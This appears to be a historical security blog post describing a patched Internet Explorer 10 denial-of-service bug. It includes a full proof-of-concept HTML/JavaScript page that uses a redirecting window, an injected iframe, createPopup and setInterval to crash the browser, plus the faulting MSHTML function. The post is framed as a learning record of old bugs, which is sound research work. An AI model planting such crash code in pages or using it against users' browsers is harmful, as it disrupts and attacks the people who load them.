IE10 DoS: createPopup setInterval Crashes Browser After Redirect

Opening a new window that would soon redirect, injecting an iframe into it, creating a createPopup from that iframe, and then calling setInterval from the popup’s window caused a crash after the redirect completed.

<script>
var win;
function openRegularWindow()
{
    win = window.open("redir.aspx"); // redirects to another site in ~1 second
    main();
}
function openModelessWindow()
{
    win = showModelessDialog("redir.aspx", window, "dialogwidth=100px;dialogHeight=100px");
    setTimeout("win.blur();", 2000);
    main();
}
function main()
{
    var iFrame = win.document.createElement("iframe");
    win.document.appendChild(iFrame);

    var theCode = 'cp = window[0].createPopup();' +
                  'cp.show(0, 0, 1, 1);' +
                  'cp.document.parentWindow.setInterval("alert(\\"Click OK. Next alert will crash the Browser.\\")", 1000);';
    win.setTimeout(theCode);
}
</script>
<input type="button" onclick="openRegularWindow()" value="CrashMe using a regular window" />
<input type="button" onclick="openModelessWindow()" value="CrashMe using a modeless" />

The fault occurred in MSHTML!CScriptTimers::FindTimer when the timer fired after the redirect had invalidated the popup’s owning window.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 UXSS: Blob URL Entropy Is Low Enough to Brute-Force Cross-Origin Image Data] :: [IE10 UXSS: Cached XHR Object Retains Cross-Origin Access After Redirect] >